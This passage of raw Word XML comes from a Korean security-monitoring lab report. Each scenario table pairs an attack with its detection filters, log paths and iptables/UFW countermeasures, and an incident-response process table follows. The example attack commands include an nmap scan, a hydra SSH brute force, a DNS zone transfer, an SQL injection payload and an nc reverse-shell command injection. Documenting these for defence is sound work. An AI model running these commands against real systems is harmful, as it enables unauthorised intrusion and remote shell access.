        </w:rPr>
        <w:t>그림 5.1-2. S1-2 증빙자료(삽입)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4252" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: WS-5-02/PCAP-5-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>PCAP/Wireshark/터미널/로그 캡처를 시나리오별로 삽입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5.1-3. 시나리오 상세(S1-3 Nmap 스캔(SSH 서비스 식별))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819"/>
        <w:gridCol w:w="4819"/>
      </w:tblGrid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항목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내용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시나리오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S1-3 / Nmap 스캔(SSH 서비스 식별)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공격 기법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포트 존재/버전 수집(정찰)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관제 데이터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패킷+auth.log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식별 기준(필터/키워드)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Wireshark: tcp.flags.syn == 1 / 로그: 사용자·비번 실패/세션 생성 없음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관측 결과(요약)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nmap -sV -p 22 10.4.0.3 수행 흔적이 auth.log에 기록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대응/후속 조치(요약)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관리망만 SSH 허용 및 스캔 차단(iptables recent) 적용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공격/검증 명령(예시)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nmap -sV -p 22 10.4.0.3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핵심 로그 경로(예시)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/var/log/auth.log (또는 /var/log/secure)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차단/대응(상세)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[SSHD]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>PermitRootLogin no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>PasswordAuthentication no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>PubkeyAuthentication yes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>[UFW]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>ufw allow from &lt;관리망IP&gt; to any port 22 proto tcp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>ufw deny 22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>[iptables]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>iptables -A INPUT -p tcp --dport 22 -m recent --name SCAN --set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>iptables -A INPUT -p tcp --dport 22 -m recent --name SCAN --update --seconds 10 --hitcount 10 -j DROP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검증 방법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정책 적용 전/후 동일 시나리오를 재현하여 탐지/차단 여부를 확인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증빙 ID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LOG-5-01/TERM-5-01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참고 문서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R3, R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5.1-3. S1-3 증빙자료(삽입)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4252" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: LOG-5-01/TERM-5-01</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>PCAP/Wireshark/터미널/로그 캡처를 시나리오별로 삽입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5.1-4. 시나리오 상세(S1-4 SSH Brute Force(Hydra))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819"/>
        <w:gridCol w:w="4819"/>
      </w:tblGrid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항목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내용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시나리오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S1-4 / SSH Brute Force(Hydra)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공격 기법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짧은 시간 대량 인증 실패 및 MaxStartups throttling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관제 데이터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패킷+auth.log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식별 기준(필터/키워드)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Wireshark: tcp.port == 22 / 로그: 동일 IP 반복 실패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관측 결과(요약)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hydra -l root -P /root/test.txt 10.4.0.3 ssh 수행 시도 확인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대응/후속 조치(요약)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키 기반 인증 전환 + 자동 차단(60초/5회) 적용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공격/검증 명령(예시)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hydra -l root -P /root/test.txt 10.4.0.3 ssh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핵심 로그 경로(예시)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/var/log/auth.log (또는 /var/log/secure)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차단/대응(상세)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iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --set --name SSH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>iptables -A INPUT -p tcp --dport 22 -m state --state NEW -m recent --update --seconds 60 --hitcount 5 --rttl --name SSH -j DROP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>Ubuntu/Debian: iptables-save &gt; /etc/iptables/rules.v4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>Rocky/RHEL: service iptables save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검증 방법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정책 적용 전/후 동일 시나리오를 재현하여 탐지/차단 여부를 확인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증빙 ID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LOG-5-01/TERM-5-02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참고 문서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R3, R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5.1-4. S1-4 증빙자료(삽입)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4252" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: LOG-5-01/TERM-5-02</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>PCAP/Wireshark/터미널/로그 캡처를 시나리오별로 삽입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5.1-5. 시나리오 상세(S1-5 DNS AXFR(Zone Transfer))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819"/>
        <w:gridCol w:w="4819"/>
      </w:tblGrid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항목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내용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시나리오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S1-5 / DNS AXFR(Zone Transfer)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공격 기법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존 파일 무단 전송(정보 노출)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관제 데이터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패킷+syslog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식별 기준(필터/키워드)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Wireshark: tcp.port == 53 / syslog: AXFR started/ended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관측 결과(요약)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dig axfr wj.com @172.16.18.28 수행 및 전송 로그 확인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대응/후속 조치(요약)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TCP 53 제한(Secondary DNS만 허용) 정책 적용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공격/검증 명령(예시)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dig axfr wj.com @172.16.18.28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핵심 로그 경로(예시)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/var/log/syslog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차단/대응(상세)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[UFW]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>ufw allow proto udp from any to any port 53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>ufw deny proto tcp from any to any port 53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>ufw allow proto tcp from &lt;SECONDARY_DNS_IP&gt; to any port 53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>[iptables]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>iptables -A INPUT -p udp --dport 53 -j ACCEPT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>iptables -A INPUT -p tcp --dport 53 -j DROP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>iptables -A INPUT -p tcp -s &lt;SECONDARY_DNS_IP&gt; --dport 53 -j ACCEPT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검증 방법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정책 적용 전/후 동일 시나리오를 재현하여 탐지/차단 여부를 확인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증빙 ID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LOG-5-02/WS-5-03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참고 문서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R3, R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5.1-5. S1-5 증빙자료(삽입)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4252" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: LOG-5-02/WS-5-03</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>PCAP/Wireshark/터미널/로그 캡처를 시나리오별로 삽입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5.1-6. 시나리오 상세(S1-6 웹 정찰(whatweb))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819"/>
        <w:gridCol w:w="4819"/>
      </w:tblGrid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항목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내용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시나리오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S1-6 / 웹 정찰(whatweb)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공격 기법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기술스택/구성 정보 수집(Enumeration)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관제 데이터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패킷+apache access.log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식별 기준(필터/키워드)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Wireshark: http / 로그: whatweb 접근 기록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관측 결과(요약)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whatweb dvwa.wj.com 요청이 access.log에 기록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대응/후속 조치(요약)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내부 전용 서비스일 경우 80/443 접근대역 제한 권고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공격/검증 명령(예시)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whatweb dvwa.wj.com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핵심 로그 경로(예시)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/var/log/apache2/dvwa_access.log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차단/대응(상세)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(내부 전용 서비스 전제) TRUSTED_NET만 80/443 허용 후 외부 차단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>iptables -A INPUT -p tcp -s &lt;TRUSTED_NET&gt; --dport 80 -j ACCEPT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>iptables -A INPUT -p tcp -s &lt;TRUSTED_NET&gt; --dport 443 -j ACCEPT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>iptables -A INPUT -p tcp --dport 80 -j DROP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>iptables -A INPUT -p tcp --dport 443 -j DROP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검증 방법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정책 적용 전/후 동일 시나리오를 재현하여 탐지/차단 여부를 확인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증빙 ID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LOG-5-03/TERM-5-03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참고 문서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R3, R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5.1-6. S1-6 증빙자료(삽입)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4252" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: LOG-5-03/TERM-5-03</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>PCAP/Wireshark/터미널/로그 캡처를 시나리오별로 삽입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5.1-7. 시나리오 상세(S1-7 SQL Injection 시도)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819"/>
        <w:gridCol w:w="4819"/>
      </w:tblGrid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항목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내용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시나리오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S1-7 / SQL Injection 시도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공격 기법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요청 인자(URL/폼) 내 SQL 예약어 포함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관제 데이터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패킷+apache access.log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식별 기준(필터/키워드)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Wireshark: http.request.uri / 로그: 특정 페이지 연속 호출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관측 결과(요약)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' OR '1'='1' # 등 페이로드 흔적 및 접근 패턴 확인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대응/후속 조치(요약)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L3/L4 방화벽만으로 차단 한계 → WAF/애플리케이션 보완 필요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공격/검증 명령(예시)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(예) ' OR '1'='1' #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핵심 로그 경로(예시)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/var/log/apache2/dvwa_access.log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차단/대응(상세)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L3/L4 방화벽만으로 페이로드 차단 한계 → WAF/입력검증/파라미터 바인딩 등 애플리케이션 조치 필요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검증 방법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정책 적용 전/후 동일 시나리오를 재현하여 탐지/차단 여부를 확인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증빙 ID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LOG-5-03/WS-5-04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참고 문서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R3, R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5.1-7. S1-7 증빙자료(삽입)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4252" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: LOG-5-03/WS-5-04</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>PCAP/Wireshark/터미널/로그 캡처를 시나리오별로 삽입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5.1-8. 시나리오 상세(S1-8 Command Injection &amp; Reverse Shell)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819"/>
        <w:gridCol w:w="4819"/>
      </w:tblGrid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항목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내용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시나리오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S1-8 / Command Injection &amp; Reverse Shell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공격 기법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/vulnerabilities/exec/ 반복 POST 및 nc 역접속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관제 데이터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패킷+apache access.log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식별 기준(필터/키워드)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로그: 비정상 경로 반복/페이로드 포함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관측 결과(요약)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127.0.0.1; nc 10.4.0.4 4444 -e /bin/sh 시도 흔적 확인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대응/후속 조치(요약)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취약 기능 접근통제/패치 + 아웃바운드 제어(egress) 및 탐지 룰 연계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공격/검증 명령(예시)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127.0.0.1; nc 10.4.0.4 4444 -e /bin/sh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핵심 로그 경로(예시)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/var/log/apache2/dvwa_access.log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차단/대응(상세)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취약 기능 제거/패치 + 아웃바운드(egress) 제어(예: 4444/tcp 차단) + 관제 룰 연계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검증 방법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정책 적용 전/후 동일 시나리오를 재현하여 탐지/차단 여부를 확인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증빙 ID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LOG-5-03/TERM-5-04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참고 문서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R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5.1-8. S1-8 증빙자료(삽입)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4252" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: LOG-5-03/TERM-5-04</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>PCAP/Wireshark/터미널/로그 캡처를 시나리오별로 삽입</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5.1-9. 시나리오 상세(S1-9 DoS(SYN Flooding))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819"/>
        <w:gridCol w:w="4819"/>
      </w:tblGrid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항목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내용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시나리오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S1-9 / DoS(SYN Flooding)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공격 기법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커널 경고: Possible SYN flooding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관제 데이터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kern.log/dmesg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식별 기준(필터/키워드)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TCP: Possible SYN flooding on port 80. Sending cookies.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관측 결과(요약)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커널 로그에서 SYN Flood 징후 메시지 확인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대응/후속 조치(요약)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SYN cookies/율제한/상위 장비 차단 정책 적용 검토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공격/검증 명령(예시)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핵심 로그 경로(예시)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/var/log/kern.log 또는 dmesg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차단/대응(상세)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SYN cookies/레이트리밋/상위 장비 ACL 등 단계적 적용 후 재현 테스트로 검증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검증 방법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정책 적용 전/후 동일 시나리오를 재현하여 탐지/차단 여부를 확인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증빙 ID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LOG-5-04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참고 문서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R4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>그림 5.1-9. S1-9 증빙자료(삽입)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638"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="4252" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="963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i/>
              </w:rPr>
              <w:t>[증빙자료 삽입 위치]  ID: LOG-5-04</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
                <w:i/>
              </w:rPr>
              <w:t>PCAP/Wireshark/터미널/로그 캡처를 시나리오별로 삽입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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>5.2 대응 방안</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
        </w:rPr>
        <w:t>대응 방안은 (1) 관제팀-운영팀 협조 체계, (2) 즉시 차단(Containment) 중심의 네트워크/서버 정책, (3) 재발 방지(근본 원인 제거) 항목으로 구성하였다.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-8. 대응 프로세스(탐지→분석→차단→복구)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w="1020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단계</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742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주요 활동</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041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담당(예시)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산출물/증빙</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>1) 탐지</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>경보/로그/패킷 이상 징후 확인</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>관제팀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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>탐지 알림, 초기 증빙(PCAP/로그)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>2) 분석</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>공격 유형 분류, 영향도/범위 산정</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>관제팀+운영팀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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>분석 리포트, 타임라인</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>3) 차단</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>출발지/포트/서비스 차단, 계정 잠금</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>운영팀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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>방화벽/서버 정책 적용 결과</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>4) 제거</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>취약점 패치, 설정 변경, 악성 요소 제거</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>운영팀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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>조치 내역서</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>5) 복구</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>서비스 정상화, 모니터링 강화</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>운영팀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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>복구 체크리스트</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1020" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>6) 환류</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3742" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>재발방지 대책/룰 튜닝/문서화</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2041" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>관제팀+운영팀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맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
              </w:rPr>
              <w:t>정책 업데이트, 교육/점검</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="맑은 고딕" w:eastAsia="맑은 고딕" w:hAnsi="맑은 고딕"/>
          <w:b/>
        </w:rPr>
        <w:t>표 5-9. 로그 제출 및 대응 협조 요청 기준(요약)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w="2608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상황</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2381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필수 로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2948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권장 로그</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701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제출 형태</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
